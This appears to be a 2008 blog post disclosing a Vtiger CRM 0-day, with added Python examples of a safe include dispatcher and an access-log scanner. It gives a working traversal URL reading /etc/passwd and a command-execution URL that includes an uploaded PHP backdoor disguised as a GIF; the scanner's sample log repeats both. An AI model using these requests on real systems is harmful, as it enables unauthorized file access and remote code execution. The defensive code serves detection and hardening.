Sunday, February 17, 2008

Vtiger CRM Exploit (0-day)

Vtiger CRM is a 100% open source Customer Relationship Management solution built on a LAMP/WAMP stack and other third-party open source packages. I made a quick run-through on their demo site and discovered some stuff. You need to be authenticated first.

LFI

http://en.vtiger.com/index.php?action=../../../../../../../../etc/passwd%00&module=Home
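The URL above works because the `action` parameter is joined onto a filesystem path and the trailing `%00` truncates whatever the application appends after it (PHP before 5.3.4 stopped at the NUL byte in filesystem calls). The same root cause carries the command-execution variant further down. As an added example that is not vtiger's code, the following Python dispatcher shows the checks an include-by-parameter handler needs: reject NUL bytes, allowlist the parameter by character class and by known value, and canonicalise the final path to confirm it is still under the module directory. `MODULE_ROOT`, the allowlist contents and the function names are assumptions made for the illustration.

```python
import os
import re
from urllib.parse import unquote

# Added example, not vtiger code: a dispatcher for the index.php?module=...&action=...
# pattern that refuses the two things the traversal URL above relies on. MODULE_ROOT
# and the allowlists are assumed values for illustration.
MODULE_ROOT = os.path.realpath("/var/www/app/modules")
ALLOWED_MODULES = {"Home", "Contacts"}
ALLOWED_ACTIONS = {"index", "DetailView", "ListView"}
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_]*$")


class InvalidRequest(ValueError):
    """Raised for any request that must not reach the filesystem."""


def resolve_action_file(module: str, action: str) -> str:
    """Map raw (still URL-encoded) module/action parameters to a script path under MODULE_ROOT."""
    module, action = unquote(module), unquote(action)

    # 1. Reject embedded NUL outright. PHP before 5.3.4 truncated filenames at \0,
    #    which is exactly what the %00 at the end of the exploit URL abuses.
    if "\x00" in module or "\x00" in action:
        raise InvalidRequest("embedded NUL byte")

    # 2. Allowlist by character class and then by known value; "../" never passes NAME_RE,
    #    so no attacker-controlled path fragment is ever joined onto the filesystem path.
    if not (NAME_RE.match(module) and NAME_RE.match(action)):
        raise InvalidRequest("illegal characters in module or action")
    if module not in ALLOWED_MODULES or action not in ALLOWED_ACTIONS:
        raise InvalidRequest("unknown module or action")

    # 3. Defence in depth: canonicalise the final path and confirm it is still inside
    #    MODULE_ROOT, so a mistake in the checks above cannot turn into an include of
    #    /etc/passwd or of an uploaded "image" in the storage directory.
    candidate = os.path.realpath(os.path.join(MODULE_ROOT, module, action + ".php"))
    if os.path.commonpath([MODULE_ROOT, candidate]) != MODULE_ROOT:
        raise InvalidRequest("resolved path escapes MODULE_ROOT")
    return candidate


def is_safe_request(module: str, action: str) -> bool:
    """Boolean wrapper, convenient for logging decisions or unit tests."""
    try:
        resolve_action_file(module, action)
        return True
    except InvalidRequest:
        return False


if __name__ == "__main__":
    for m, a in [("Home", "index"),
                 ("Home", "../../../../../../../../etc/passwd%00"),
                 ("Home", "../../storage/2008/February/week1/31361_kidlat.gif%00")]:
        print(f"{m}/{a!r}: {'allowed' if is_safe_request(m, a) else 'rejected'}")
```

The allowlist in step 2 is what actually closes the hole; step 3 is there so that a future change to the allowlist (or a module that builds paths from other input) still cannot escape the module root.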

Command Execution

First, upload a php backdoor disguised as a valid picture file. And then...

http://en.vtiger.com/index.php?cmd=uname%20-a;id;pwd&action=../../storage/2008/February/week1/31361_kidlat.gif%00&module=Home

I did not install the software and I stopped when I reached this point so I wasn't able to find all the bugs =)

[there should be no space between % and 00 in the url, can't post it as such here coz blogger's stripping them out]
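Both requests above leave a distinctive trail in the web server's access log: a percent-encoded NUL in the query string, `../` sequences in a parameter the application turns into a path, and, for the command-execution step, an include of a file under the upload directory with an image extension alongside a `cmd` parameter. The following Python scanner, an added example rather than anything from the post, parses Apache combined-format lines and tags requests that match those patterns. The log lines, IP addresses and timestamps are constructed; the parameter names `action`, `module` and `cmd` and the `storage/` path come from the URLs in the post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example, not from the post: flag the request patterns shown above in Apache
# combined-format access logs. The log lines, IPs and timestamps below are constructed.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Feb/2008:10:01:02 +0800] "GET /index.php?action=index&module=Home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Feb/2008:10:02:11 +0800] "GET /index.php?action=../../../../../../../../etc/passwd%00&module=Home HTTP/1.1" 200 1873 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Feb/2008:10:05:40 +0800] "GET /index.php?cmd=uname%20-a;id;pwd&action=../../storage/2008/February/week1/31361_kidlat.gif%00&module=Home HTTP/1.1" 200 412 "-" "Mozilla/5.0"
10.0.0.7 - - [17/Feb/2008:10:06:00 +0800] "GET /index.php?action=DetailView&module=Contacts&record=12 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) '
)
PATH_PARAMS = ("action", "module")          # parameters the application turns into include paths
IMAGE_RE = re.compile(r"\.(?:gif|jpe?g|png)$", re.I)


def classify_url(url: str) -> list:
    """Return the detection tags that apply to one request URL (empty list if nothing matched)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    tags = []
    values = [v for vs in params.values() for v in vs]   # parse_qs already percent-decodes
    if any("\x00" in v for v in values):
        tags.append("null-byte")
    path_values = [v for p in PATH_PARAMS for v in params.get(p, [])]
    if any("../" in v or "..\\" in v for v in path_values):
        tags.append("traversal")
    # The second URL in the post: a path parameter pointing at an uploaded "image".
    if any(IMAGE_RE.search(v.rstrip("\x00")) and "storage/" in v for v in path_values):
        tags.append("include-of-upload")
    # A cmd parameter on an otherwise suspicious request is the command-execution step.
    if "cmd" in params and tags:
        tags.append("cmd-param")
    return tags


def scan_access_log(text: str) -> list:
    """Parse each combined-format line and return a finding for every request that trips a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_url(m["url"])
        if tags:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "tags": tags})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} {','.join(f['tags'])}")
```

Checking the decoded parameter values rather than the raw query string matters: `%2e%2e%2f` and `%00` look harmless as text but decode to `../` and a NUL, and `parse_qs` does that decoding for you. A 200 status on a tagged request is the signal worth escalating, since it means the include succeeded.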

The real reason...

... why you rarely see any Windows XP SP2 remote exploit is because there's a lot of buyers out there for these kinds of exploits and they pay well =)

Defcon in the Philippines

DEFCON is now in the Philippines. The guys from the defunct rootdrive.net and nullcode.net have registered a new DEFCON group. Visit their new site. Personally, I'm looking forward to a real hacker-type con =)